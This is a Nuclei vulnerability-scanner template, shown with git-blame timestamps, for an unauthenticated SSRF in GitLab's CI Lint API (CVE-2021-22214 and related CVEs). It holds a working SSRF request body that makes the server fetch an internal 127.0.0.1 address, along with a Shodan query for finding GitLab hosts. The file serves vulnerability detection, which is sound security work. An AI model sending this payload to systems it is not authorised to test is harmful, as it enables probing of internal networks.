nuclei-templates/cves/2021/CVE-2021-22214.yaml

50 lines
1.6 KiB
YAML
Raw Normal View History

2021-06-18 09:12:13 +00:00
id: CVE-2021-22214
2022-03-04 13:50:03 +00:00
info:
2022-03-04 13:50:03 +00:00
author: Suman_Kar,GitLab Red Team
2021-06-18 09:32:17 +00:00
name: Unauthenticated Gitlab SSRF - CI Lint API
severity: high
2022-03-04 02:04:56 +00:00
description: |
When requests to the internal network for webhooks are enabled,
a server-side request forgery vulnerability in GitLab CE/EE affecting all
versions starting from 10.5 was possible to exploit for an unauthenticated
attacker even on a GitLab instance where registration is limited.
The same vulnerability actually spans multiple CVEs, due to similar reports
that were fixed across separate patches. These CVEs are:
2022-03-04 02:04:56 +00:00
- CVE-2021-39935
- CVE-2021-22214
- CVE-2021-22175
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
2022-03-04 02:04:56 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-39935
- https://nvd.nist.gov/vuln/detail/CVE-2021-22175
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
2022-03-04 13:50:03 +00:00
metadata:
shodan-query: http.title:"GitLab"
2022-03-04 03:25:00 +00:00
tags: cve,cve2021,gitlab,ssrf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
2022-03-04 13:50:03 +00:00
cve-id: CVE-2021-22214,CVE-2021-39935,CVE-2021-22175
cwe-id: CWE-918
2022-03-04 13:50:03 +00:00
requests:
2022-03-04 02:04:56 +00:00
- method: POST
path:
- "{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"
2022-03-04 13:50:03 +00:00
2022-03-04 02:04:56 +00:00
headers:
Content-Type: application/json
2022-03-04 13:50:03 +00:00
body: |
{"content": "include:\n remote: http://127.0.0.1:9100/test.yml"}
2022-03-04 02:04:56 +00:00
redirects: true
max-redirects: 3
matchers:
2021-06-18 09:32:17 +00:00
- type: word
2022-03-04 02:04:56 +00:00
part: body
2021-06-18 09:32:17 +00:00
words:
- "does not have valid YAML syntax"